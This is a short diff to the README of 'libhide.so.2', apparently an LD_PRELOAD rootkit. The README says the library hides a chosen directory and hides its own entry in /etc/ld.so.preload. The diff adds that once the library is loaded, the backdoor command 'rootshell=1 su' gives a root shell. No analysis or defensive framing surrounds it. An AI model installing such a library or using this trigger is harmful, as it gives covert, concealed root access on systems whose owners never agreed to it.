carls0n/libhide.so.2/README.md

 [+] Hides a specified directory<br>
 [+] Hides entry in /etc/ld.so.preload

-Also, you can get a rootshell
+Also, you can get a rootshell once you have the shared library entered into the preloader.
 ```
 rootshell=1 su
 ```